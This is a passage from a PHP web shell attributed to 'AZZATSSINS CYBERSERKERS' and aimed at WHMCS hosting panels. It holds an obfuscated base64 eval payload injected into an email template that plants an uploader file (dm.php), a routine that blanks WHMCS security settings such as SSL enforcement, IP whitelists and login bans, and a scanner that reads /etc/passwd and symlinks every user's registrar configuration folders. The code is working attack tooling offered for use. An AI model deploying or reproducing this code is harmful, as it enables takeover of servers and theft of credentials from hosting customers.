3333. name=shell>{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUjBsR09EbGhVRHM4Y0NCaGJHbG5iajBpWTJWdWRHVnlJajROQ2cwS1BEOXdhSEFOQ21WeWNtOXlYM0psY0c5eWRHbHVaeWd3S1RzTkNpUnpZM0pwY0hSdVlXMWxJRDBnSkY5VFJWSldSVkpiSjFORFVrbFFWRjlPUVUxRkoxMDdEUW9rWm1sc1pXNWhiV1VnUFNBa1gxQlBVMVJiSW1acGJHVnVZVzFsSWwwN0RRcHBaaWdrWDFCUFUxUmJJbk4xWW0xcGRDSmRJRDA5SUNKUGNHVnVJaWtOQ25zTkNtbG1LR1pwYkdWZlpYaHBjM1J6S0NSbWFXeGxibUZ0WlNrcERRcDdEUW9rWm1sc1pXTnZiblJsYm5SeklEMGdhSFJ0YkdWdWRHbDBhV1Z6S0dacGJHVmZaMlYwWDJOdmJuUmxiblJ6S0NSbWFXeGxibUZ0WlNrcE93MEthV1lvSVNSbWFXeGxZMjl1ZEdWdWRITXBEUW9rYzNSaGRIVnpJRDBnSWp4bWIyNTBJR1poWTJVOUoxWmxjbVJoYm1FbklITjBlV3hsUFNkbWIyNTBMWE5wZW1VNklEaHdkQ2MrUlhKeWIzSWdUbTkwYUdsdVp5QkdhV3hsUEM5bWIyNTBQaUk3RFFwOURRcGxiSE5sRFFva2MzUmhkSFZ6SUQwZ0lqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1JtbHNaU0JrYjJWeklHNXZkQ0JsZUdsemRDRThMMlp2Ym5RK0lqc05DbjBKQ1EwS1pXeHpaU0JwWmlna1gxQlBVMVJiSW5OMVltMXBkQ0pkSUQwOUlDSkVaV3hsZEdVaUtRMEtldzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR1pwYkdWdVlXMWxLU2tOQ25zTkNtbG1LSFZ1YkdsdWF5Z2tabWxzWlc1aGJXVXBLUWtOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1R2FXeGxJSE4xWTJObGMzTm1kV3hzZVNCa1pXeGxkR1ZrSVR3dlptOXVkRDRpT3cwS1pXeHpaUTBLSkhOMFlYUjFjeUE5SUNJOFptOXVkQ0JtWVdObFBTZFdaWEprWVc1aEp5QnpkSGxzWlQwblptOXVkQzF6YVhwbE9pQTRjSFFuUGtOdmRXeGtJRzV2ZENCa1pXeGxkR1VnWm1sc1pTRThMMlp2Ym5RK0lqc05DbjBOQ21Wc2MyVU5DaVJ6ZEdGMGRYTWdQU0FpUEdadmJuUWdabUZqWlQwblZtVnlaR0Z1WVNjZ2MzUjViR1U5SjJadmJuUXRjMmw2WlRvZ09IQjBKejVHYVd4bElHUnZaWE1nYm05MElHVjRhWE4wSVR3dlptOXVkRDRpT3cwS2ZRMEtaV3h6WlNCcFppZ2tYMUJQVTFSYkluTjFZbTFwZENKZElEMDlJQ0pUWVhabElpa05DbnNOQ2lSbWFXeGxZMjl1ZEdWdWRITWdQU0J6ZEhKcGNITnNZWE5vWlhNb2FIUnRiRjlsYm5ScGRIbGZaR1ZqYjJSbEtDUmZVRTlUVkZzaVkyOXVkR1Z1ZEhNaVhTa3BPdzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR1pwYkdWdVlXMWxLU2tOQ25WdWJHbHVheWdrWm1sc1pXNWhiV1VwT3cwS0pHaGhibVJzWlNBOUlHWnZjR1Z1S0NSbWFXeGxibUZ0WlN3Z0luY2lLVHNOQ21sbUtDRWthR0Z1Wkd4bEtRMEtKSE4wWVhSMWN5QTlJQ0k4Wm05dWRDQm1ZV05sUFNkV1pYSmtZVzVoSnlCemRIbHNaVDBuWm05dWRDMXphWHBsT2lBNGNIUW5Qa052ZFd4a0lHNXZkQ0J2Y0dWdUlHWnBiR1VnWm05eUlIZHlhWFJsSUdGalkyVnpjeUVnUEM5bWIyNTBQaUk3RFFwbGJITmxEUXA3RFFwcFppZ2habmR5YVhSbEtDUm9ZVzVrYkdVc0lDUm1hV3hsWTI5dWRHVnVkSE1wS1EwS0pITjBZWFIxY3lBOUlDUnpkR0YwZFhNdUlqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1EyOTFiR1FnYm05MElIZHlhWFJsSUhSdklHWnBiR1VoSUNoTllYbGlaU0I1YjNVZ1pHbGtiaWQwSUdWdWRHVnlJR0Z1ZVNCMFpYaDBQeWs4TDJadmJuUStJanNOQ21aamJHOXpaU2drYUdGdVpHeGxLVHNOQ24wTkNpUm1hV3hsWTI5dWRHVnVkSE1nUFNCb2RHMXNaVzUwYVhScFpYTW9KR1pwYkdWamIyNTBaVzUwY3lrN0RRcDlEUXBsYkhObERRcDdEUW9rYzNSaGRIVnpJRDBnSWp4bWIyNTBJR1poWTJVOUoxWmxjbVJoYm1FbklITjBlV3hsUFNkbWIyNTBMWE5wZW1VNklEaHdkQ2MrVG04Z1ptbHNaU0JzYjJGa1pXUWhQQzltYjI1MFBpSTdEUXA5RFFvL1BnMEtQSFJoWW14bElHSnZjbVJsY2owaU1DSWdZV3hwWjI0OUltTmxiblJsY2lJK1BIUnlQangwWkQ0OGRHRmliR1VnZDJsa2RHZzlJakV3TUNVaUlHSnZjbVJsY2owaU1DSStQSFJ5UGp4MFpENE5DanhtYjNKdElHMWxkR2h2WkQwaWNHOXpkQ0lnWVdOMGFXOXVQU0k4UDBWamFHOGdKSE5qY21sd2RHNWhiV1U3UHo0aVBnMEtQR2x1Y0hWMElITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2JtRnRaVDBpWm1sc1pXNWhiV1VpSUhSNWNHVTlJblJsZUhRaUlIWmhiSFZsUFNJOFAwVmphRzhnSkdacGJHVnVZVzFsT3o4K0lpQnphWHBsUFNJM01pSStEUW84YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCemRIbHNaVDBpWTI5c2IzSTZiR2x0WlR0aVlXTnJaM0p2ZFc1a0xXTnZiRzl5T2lNd01EQXdNREFpSUc1aGJXVTlJbk4xWW0xcGRDSWdkbUZzZFdVOUlrOXdaVzRpUGcwS1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcGRDSWdjM1I1YkdVOUltTnZiRzl5T214cGJXVTdZbUZqYTJkeWIzVnVaQzFqYjJ4dmNqb2pNREF3TURBd0lpQnVZVzFsUFNKemRXSnRhWFFpSUhaaGJIVmxQU0pFWld4bGRHVWlQand2ZEdRK1BDOTBjajQ4TDNSaFlteGxQZzBLUEdadmJuUWdabUZqWlQwaVZtVnlaR0Z1WVNJZ2MzUjViR1U5SW1admJuUXRjMmw2WlRvZ01URndkQ0krRFFvOGRHVjRkR0Z5WldFZ2JtRnRaVDBpWTI5dWRHVnVkSE1pSUhOMGVXeGxQU0pqYjJ4dmNqcHNhVzFsTzJKaFkydG5jbTkxYm1RdFkyOXNiM0k2SXpBd01EQXdNQ0lnWTI5c2N6MGlOekFpSUhKdmQzTTlJakkxSWo0TkNqdy9SV05vYnlBa1ptbHNaV052Ym5SbGJuUnpPejgrUEM5MFpYaDBZWEpsWVQ0OEwyWnZiblErUEdKeVBnMEtQR2x1Y0hWMElIUjVjR1U5SW5OMVltMXBkQ0lnYzNSNWJHVTlJbU52Ykc5eU9teHBiV1U3WW1GamEyZHliM1Z1WkMxamIyeHZjam9qTURBd01EQXdJaUJ1WVcxbFBTSnpkV0p0YVhRaUlIWmhiSFZsUFNKVFlYWmxJajROQ2p4cGJuQjFkQ0IwZVhCbFBTSnlaWE5sZENJZ2MzUjViR1U5SW1OdmJHOXlPbXhwYldVN1ltRmphMmR5YjNWdVpDMWpiMnh2Y2pvak1EQXdNREF3SWlCMllXeDFaVDBpVW1WelpYUWlQZzBLUEM5bWIzSnRQZzBLUEhBK0RRbzhhRE0rWDFWUVRFOUJSQ0JHU1V4Rlh6eG9NejROQ2cwS1BEOXdhSEFOQ2cwS1pXTm9ieUFuUEdadmNtMGdZV04wYVc5dVBTSWlJRzFsZEdodlpEMGljRzl6ZENJZ1pXNWpkSGx3WlQwaWJYVnNkR2x3WVhKMEwyWnZjbTB0WkdGMFlTSWdibUZ0WlQwaWRYQnNiMkZrWlhJaUlHbGtQU0oxY0d4dllXUmxjaUkrSnpzTkNnMEtaV05vYnlBblVFRlVTQ0JVUVZKSFJWUWdPaUE4YVc1d2RYUWdibUZ0WlQwaWRYQnNiMkZrZEc4aUlITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2RIbHdaVDBpZEdWNGRDSWdjMmw2WlQwaU5UQWlJSFpoYkhWbFBTSW5MbWRsZEdOM1pDZ3BMaWNpUGp4aWNpQXZQaWM3RFFwbFkyaHZJQ2M4YVc1d2RYUWdkSGx3WlQwaVptbHNaU0lnYzNSNWJHVTlJbU52Ykc5eU9teHBiV1U3WW1GamEyZHliM1Z1WkMxamIyeHZjam9qTURBd01EQXdJaUJ1WVcxbFBTSm1hV3hsSWlCemFYcGxQU0l6TUNJK1BHbHVjSFYwSUc1aGJXVTlJbDkxY0d3aUlITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2RIbHdaVDBpYzNWaWJXbDBJaUJwWkQwaVgzVndiQ0lnZG1Gc2RXVTlJbFZ3Ykc5aFpDSStQQzltYjNKdFBpYzdEUXBwWmlnZ0pGOVFUMU5VV3lkZmRYQnNKMTBnUFQwZ0lsVndiRzloWkNJZ0tTQjdEUXBwWmloQVkyOXdlU2drWDBaSlRFVlRXeWRtYVd4bEoxMWJKM1J0Y0Y5dVlXMWxKMTBzSUNSZlVFOVRWRnNuZFhCc2IyRmtkRzhuWFM0bkx5Y3VKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdEUW9OQ21WamFHOGdKenhtYjI1MElHTnZiRzl5UFNKc2FXMWxJajViSzEwZ1ZYQnNiMkZrSUZOMWEzTmxjeUE2ZGlBOFluSXZQaUJiSzEwZ0p5NGtYMUJQVTFSYkozVndiRzloWkhSdkoxMHVJaThpTGlSZlJrbE1SVk5iSjJacGJHVW5YVnNuYm1GdFpTZGRPdzBLZlNCbGJITmxJSHNOQ21WamFHOGdKMXQrWFNCVmNHeHZZV1FnUm1GcGJHVmtJRlJmVkNCYmZsMDhMMlp2Ym5RK1BHSnlQaWM3RFFwOUlIME5DajgrRFFvPScpOw0KDQokZm9wZW4gPSBmb3BlbiAoJ2RtLnBocCcsJ3cnKTsNCiR3cml0ZSAgPSBmd3JpdGUoJGZvcGVuICwgJGMwZGUpOw=='));{/php}</textarea>
3334. </td></tr>
3335. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
3336. </table>
3337. <br>
3338. </form>
3339. </center>
3340. <?php
3341. if(isset($_POST['plapon'])) {
3342. $anu1 = $_POST['anu1'];
3343. $anu2 = $_POST['anu2'];
3344. $anu3 = $_POST['anu3'];
3345. $anu4 = $_POST['anu4'];
3346. @mysql_connect($anu1,$anu2,$anu3);
3347. @mysql_select_db($anu4);
3348. $shell=str_replace("'","'",$shell);
3349. $gosok_shell = $_POST['shell'];
3350. $colok = "UPDATE tblemailtemplates SET message ='".$gosok_shell."' WHERE subject ='Welcome'";
3351. $udah_ganteng=@mysql_query($colok);if($udah_ganteng)
3352. {
3353. echo "<font color='lime'>SUKSES BOS GANTENG :P</font>";
3354. }
3355. }
3356. }
3357.  
3358.  
3359.  
3360. if($_GET['whmcs']=="token"){
3361. set_time_limit(0);
3362. ?>
3363. <p><br/><body>
3364. <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ BYPASS </span> <span class="b8">TOKEN ]:=O</span></b></nobr><br/><br/>
3365. <p><form method="post">
3366. <table border=1>
3367. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu1" value="localhost"></td></tr>
3368. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu2"></td></tr>
3369. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu3"></td></tr>
3370. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu4"></td></tr>
3371. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
3372. </table>
3373. <br>
3374. </FORM>
3375. </center>
3376. <?php
3377. if(isset($_POST['plapon'])) {
3378.  
3379. $anu1 = $_POST['anu1'];
3380. $anu2 = $_POST['anu2'];
3381. $anu3 = $_POST['anu3'];
3382. $anu4 = $_POST['anu4'];
3383. @mysql_connect($anu1,$anu2,$anu3);
3384. @mysql_select_db($anu4);
3385.  
3386. $crot1 = "UPDATE tblconfiguration SET value='' WHERE setting='InvalidLoginBanLength'";
3387. $crot2 = "UPDATE tblconfiguration SET value='' WHERE setting='AdminForceSSL'";
3388. $crot3 = "UPDATE tblconfiguration SET value='' WHERE setting='RequiredPWStrength'";
3389. $crot4 = "UPDATE tblconfiguration SET value='' WHERE setting='MaintenanceMode'";
3390. $crot5 = "UPDATE tblconfiguration SET value='' WHERE setting='APIAllowedIPs'";
3391. $crot6 = "UPDATE tblconfiguration SET value='' WHERE setting='LoginFailures'";
3392. $crot7 = "UPDATE tblconfiguration SET value='' WHERE setting='InstanceID'";
3393. $crot8 = "UPDATE tblconfiguration SET value='' WHERE setting='WhitelistedIPs'";
3394. $crot9 = "UPDATE tblconfiguration SET value='' WHERE setting='ToggleInfoPopup'";$crot10 = "UPDATE tblconfiguration SET value='' WHERE setting='token_namespaces'";
3395.  
3396. $udah_ganteng=@mysql_query($crot1);
3397. $udah_ganteng=@mysql_query($crot2);
3398. $udah_ganteng=@mysql_query($crot3);
3399. $udah_ganteng=@mysql_query($crot4);
3400. $udah_ganteng=@mysql_query($crot5);
3401. $udah_ganteng=@mysql_query($crot6);
3402. $udah_ganteng=@mysql_query($crot7);
3403. $udah_ganteng=@mysql_query($crot8);
3404. $udah_ganteng=@mysql_query($crot9);
3405. $udah_ganteng=@mysql_query($crot10);
3406.  
3407. if($udah_ganteng)
3408. {
3409. echo "<font color='lime'>SUKSES BOS GANTENG :P</font>";
3410. }
3411. }
3412. }
3413.  
3414. if($_GET['whmcs']=="scan"){
3415. set_time_limit(0);
3416.  
3417. echo '<br><br><body bgcolor=black><center>
3418. <img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"><br/><br/>
3419. <nobr><span class="b7">O=:[ SCAN CMS</span> <span class="b8">WHMCS ]:=O</nobr></span><br/><br/>
3420. <form method="POST">
3421. <center>
3422. <textarea style="color:red;background-color:#000000" cols="60" name="passwd" rows="20">';
3423. $uSr=file("/etc/passwd");
3424. foreach($uSr as $usrr)
3425. {
3426. $str=explode(":",$usrr);
3427. echo $str[0]."\n";
3428. }
3429. ?>
3430.  
3431. </textarea><p>
3432. <nobr><font style="color:red;background-color:#000000">
3433. [~] Home :
3434. <select style="color:red;background-color:#000000" title="Select Target Home" name="home" size="10">
3435. <option title="home" value="home">home</option>
3436. <option title="home2" value="home2">home2</option>
3437. <option title="home3" value="home3">home3</option>
3438. <option title="home4" value="home4">home4</option>
3439. <option title="home5" value="home5">home5</option>
3440. <option title="home6" value="home6">home6</option>
3441. <option title="home7" value="home7">home7</option>
3442. <option title="home8" value="home8">home8</option>
3443. <option title="home9" value="home9">home9</option>
3444. <option title="home10" value="home10">home10</option>
3445. </select>&nbsp;&nbsp;&nbsp; [~] Htaccess :
3446. <select style="color:red;background-color:#000000" title="Select Software" name="soft" size="10">
3447. <option title="Apache" value="Options all
3448. Options +Indexes
3449. Options +FollowSymLinks
3450. DirectoryIndex Sux.html
3451. AddType text/plain .php
3452. AddHandler server-parsed .php
3453. AddType text/plain .html
3454. AddHandler txt .html
3455. Require None
3456. Satisfy Any">Apache</option>
3457. <option title="Litespeed" value="
3458. Options +FollowSymLinks
3459. DirectoryIndex seees.html
3460. RemoveHandler .php
3461. AddType application/octet-stream .php ">Litespeed</option>
3462.  
3463. </select> &nbsp;&nbsp; <input style="color:red;background-color:#000000" name="anu" size="10"
3464. value="<< &nbsp;START SCAN&nbsp; >>" type="submit">
3465. <br/><br/></form></center>
3466.  
3467. <?php
3468. @ini_set('html_errors',0);
3469. @ini_set('max_execution_time',0);
3470. @ini_set('display_errors', 0);
3471. @ini_set('file_uploads',1);
3472. if ($_POST['anu']) {
3473. $path = $_POST['path'];
3474. $home = $_POST['home'];
3475.  
3476. $functions=@ini_get("disable_functions");
3477. if(eregi("symlink",$functions))
3478. {
3479. die ('Kurang Ganteng Cok');
3480. }
3481. @mkdir(WHMCS, 0755);
3482. @chdir(WHMCS);
3483.  
3484.  
3485.  
3486. $htaccess=$_POST['soft'];
3487. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
3488.  
3489. $passwd=explode("\n",$_POST["passwd"]);
3490. foreach($passwd as $pwd){
3491. $user=trim($pwd);
3492.  
3493. @symlink('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER');
3494.  
3495. @symlink('/'.$home.'/'.$user.'/public_html/modules/registrars/',$user.' <~ WHMCS-1'); @symlink('/'.$home.'/'.$user.'/public_html/account/modules/registrars/',$user.' <~ WHMCS-2');
3496. @symlink('/'.$home.'/'.$user.'/public_html/accounts/modules/registrars/',$user.' <~ WHMCS-3');
3497. @symlink('/'.$home.'/'.$user.'/public_html/central/modules/registrars/',$user.' <~ WHMCS-4');
3498. @symlink('/'.$home.'/'.$user.'/public_html/clienti/modules/registrars/',$user.' <~ WHMCS-5');
3499. @symlink('/'.$home.'/'.$user.'/public_html/client/modules/registrars/',$user.' <~ WHMCS-6');
3500. @symlink('/'.$home.'/'.$user.'/public_html/cliente/modules/registrars/',$user.' <~ WHMCS-7');
3501. @symlink('/'.$home.'/'.$user.'/public_html/clientes/modules/registrars/',$user.' <~ WHMCS-8');
3502. @symlink('/'.$home.'/'.$user.'/public_html/clients/modules/registrars/',$user.' <~ WHMCS-9');
3503. @symlink('/'.$home.'/'.$user.'/public_html/clientarea/modules/registrars/',$user.' <~ WHMCS-9');
3504. @symlink('/'.$home.'/'.$user.'/public_html/clientsarea/modules/registrars/',$user.' <~ WHMCS-10');
3505. @symlink('/'.$home.'/'.$user.'/public_html/client-area/modules/registrars/',$user.' <~ WHMCS-11');
3506. @symlink('/'.$home.'/'.$user.'/public_html/clients-area/modules/registrars/',$user.' <~ WHMCS-12');
3507. @symlink('/'.$home.'/'.$user.'/public_html/clientzone/modules/registrars/',$user.' <~ WHMCS-13');
3508. @symlink('/'.$home.'/'.$user.'/public_html/client-zone/modules/registrars/',$user.' <~ WHMCS-14');
3509. @symlink('/'.$home.'/'.$user.'/public_html/core/modules/registrars/',$user.' <~ WHMCS-15');
3510. @symlink('/'.$home.'/'.$user.'/public_html/company/modules/registrars/',$user.' <~ WHMCS-16');
3511. @symlink('/'.$home.'/'.$user.'/public_html/customer/modules/registrars/',$user.' <~ WHMCS-17');
3512. @symlink('/'.$home.'/'.$user.'/public_html/customers/modules/registrars/',$user.' <~ WHMCS-18');
3513. @symlink('/'.$home.'/'.$user.'/public_html/bill/modules/registrars/',$user.' <~ WHMCS-19');
3514. @symlink('/'.$home.'/'.$user.'/public_html/billing/modules/registrars/',$user.' <~ WHMCS-20');
3515. @symlink('/'.$home.'/'.$user.'/public_html/finance/modules/registrars/',$user.' <~ WHMCS-21');
3516. @symlink('/'.$home.'/'.$user.'/public_html/financeiro/modules/registrars/',$user.' <~ WHMCS-22');
3517. @symlink('/'.$home.'/'.$user.'/public_html/host/modules/registrars/',$user.' <~ WHMCS-23');
3518. @symlink('/'.$home.'/'.$user.'/public_html/hosts/modules/registrars/',$user.' <~ WHMCS-24');
3519. @symlink('/'.$home.'/'.$user.'/public_html/hosting/modules/registrars/',$user.' <~ WHMCS-25');
3520. @symlink('/'.$home.'/'.$user.'/public_html/hostings/modules/registrars/',$user.' <~ WHMCS'-26);
3521. @symlink('/'.$home.'/'.$user.'/public_html/klien/modules/registrars/',$user.' <~ WHMCS-27');
3522. @symlink('/'.$home.'/'.$user.'/public_html/manage/modules/registrars/',$user.' <~ WHMCS-28');
3523. @symlink('/'.$home.'/'.$user.'/public_html/manager/modules/registrars/',$user.' <~ WHMCS-29');
3524. @symlink('/'.$home.'/'.$user.'/public_html/member/modules/registrars/',$user.' <~ WHMCS-30');
3525. @symlink('/'.$home.'/'.$user.'/public_html/members/modules/registrars/',$user.' <~ WHMCS-31');
3526. @symlink('/'.$home.'/'.$user.'/public_html/my/modules/registrars/',$user.' <~ WHMCS-32');
3527. @symlink('/'.$home.'/'.$user.'/public_html/myaccount/modules/registrars/',$user.' <~ WHMCS-33');
3528. @symlink('/'.$home.'/'.$user.'/public_html/my-account/client/modules/registrars/',$user.' <~ WHMCS-34');
3529. @symlink('/'.$home.'/'.$user.'/public_html/myaccounts/modules/registrars/',$user.' <~ WHMCS-35');
3530. @symlink('/'.$home.'/'.$user.'/public_html/my-accounts/modules/registrars/',$user.' <~ WHMCS-36');
3531. @symlink('/'.$home.'/'.$user.'/public_html/order/modules/registrars/',$user.' <~ WHMCS-37');
3532. @symlink('/'.$home.'/'.$user.'/public_html/orders/modules/registrars/',$user.' <~ WHMCS-38');
3533. @symlink('/'.$home.'/'.$user.'/public_html/painel/modules/registrars/',$user.' <~ WHMCS-39');
3534. @symlink('/'.$home.'/'.$user.'/public_html/panel/modules/registrars/',$user.' <~ WHMCS-40');
3535. @symlink('/'.$home.'/'.$user.'/public_html/panels/modules/registrars/',$user.' <~ WHMCS-41');
3536. @symlink('/'.$home.'/'.$user.'/public_html/portal/modules/registrars/',$user.' <~ WHMCS-42');
3537. @symlink('/'.$home.'/'.$user.'/public_html/portals/modules/registrars/',$user.' <~ WHMCS-43');
3538. @symlink('/'.$home.'/'.$user.'/public_html/secure/modules/registrars/',$user.' <~ WHMCS-44');
3539. @symlink('/'.$home.'/'.$user.'/public_html/support/modules/registrars/',$user.' <~ WHMCS-45');
3540. @symlink('/'.$home.'/'.$user.'/public_html/supporte/modules/registrars/',$user.' <~ WHMCS-46');
3541. @symlink('/'.$home.'/'.$user.'/public_html/supports/modules/registrars/',$user.' <~ WHMCS-47');
3542. @symlink('/'.$home.'/'.$user.'/public_html/web/modules/registrars/',$user.' <~ WHMCS-48');
3543. @symlink('/'.$home.'/'.$user.'/public_html/webhost/modules/registrars/',$user.' <~ WHMCS-49');
3544. @symlink('/'.$home.'/'.$user.'/public_html/webhosting/modules/registrars/',$user.' <~ WHMCS-50');
3545. @symlink('/'.$home.'/'.$user.'/public_html/whm/modules/registrars/',$user.' <~ WHMCS-51');
3546. @symlink('/'.$home.'/'.$user.'/public_html/whmcs/modules/registrars/',$user.' <~ WHMCS-52');
3547. @symlink('/'.$home.'/'.$user.'/public_html/whmcs2/modules/registrars/',$user.' <~ WHMCS-53');
3548. @symlink('/'.$home.'/'.$user.'/public_html/Whm/modules/registrars/',$user.' <~ WHMCS-54');
3549. @symlink('/'.$home.'/'.$user.'/public_html/Whmcs/modules/registrars/',$user.' <~ WHMCS-55');
3550. @symlink('/'.$home.'/'.$user.'/public_html/WHM/modules/registrars/',$user.' <~ WHMCS-56');
3551. @symlink('/'.$home.'/'.$user.'/public_html/WHMCS/modules/registrars/',$user.' <~ WHMCS-57');
3552. }
3553. echo '<hr color="#00bfff"><center>
3554. <font face="Audiowide" size="5" style="color:#00bfff;background-color:#000000">
3555. <img src="http://www.komunitas.for-indonesia.com/images/smiley/piss.gif"><br/>
3556. Scanning Complete....<br/>
3557. Now Checking Folder Result....<br/><br/><br/>
3558. <a href="/WHMCS">O=[ GO TO HELL ]=O</a>
3559. </font>
3560. <br/><br/><br/></center> </body></html> ';
3561. }
3562. }
3563.  
3564.  
3565. echo'<br><br>
3566. <div style="background:blue;margin:0px;padding:8px;text-align:center;color:black;">
3567. <font color=silver>&copy; </font><b><i>AZZATSSINS CYBERSERKERS</i></b>
3568. </div>';
3569. ?>